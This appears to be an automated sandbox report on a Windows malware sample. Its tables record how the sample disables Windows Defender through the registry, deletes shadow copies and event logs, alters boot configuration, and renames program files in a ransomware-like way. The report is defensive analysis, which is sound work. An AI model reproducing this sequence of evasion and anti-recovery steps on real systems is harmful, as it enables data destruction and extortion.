Analysis Overview
SHA256
df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687
Threat Level: Known bad
The file df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687 was found to be: Known bad.
Malicious Activity Summary
Deletes Windows Defender Definitions
Modifies security service
Modifies Windows Defender Real-time Protection settings
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
Reads user/profile data of web browsers
Loads dropped DLL
Enumerates connected drives
Drops file in Windows directory
Launches sc.exe
Drops file in Program Files directory
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: AddClipboardFormatListener
Modifies registry class
Runs net.exe
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Interacts with shadow copies
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-13 13:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-13 13:26
Reported
2022-01-13 13:31
Platform
win7-en-20211208
Max time kernel
106s
Max time network
15s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Enumerates connected drives
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_ja.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01858_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Newsprint.xml.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14791_.GIF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\ONENOTE_F_COL.HXK.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIcon.jpg.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_ja.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\ext\localedata.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\CASHREG.WAV.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Purble Place\ja-JP\PurblePlace.exe.mui.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_foggy.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00172_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Paper.xml.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21295_.GIF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonSubpicture.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.zh_CN_5.5.0.165303.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\tabskb.dll.mui | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00174_.GIF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107490.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.sun.el_2.2.0.v201303151357.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Purble Place\en-US\PurblePlace.exe.mui.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Flyout_Thumbnail_Shadow.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0188669.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Couture.eftx.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0234131.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationRight_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-ui.xml.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\release.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\gadget.xml | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_settings.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormToolImages.jpg.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\UrbanPhotoAlbum.potx.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-disable.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\descript.ion.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyDrop32x32.gif.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105238.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00685_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00792_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00917_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\cloud_Thumbnail.bmp | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist_jstree.xml.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03241_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\TAB_OFF.GIF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21518_.GIF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Multiplayer\Backgammon\de-DE\bckgRes.dll.mui.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\settings.html | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD20013_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSI79F2.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7A41.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7AFE.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7B5C.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7BBB.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| File opened for modification | C:\Windows\Installer\f7777a0.mst | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7A70.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7BDB.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f7777a0.mst | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI78F7.tmp | C:\Windows\system32\msiexec.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
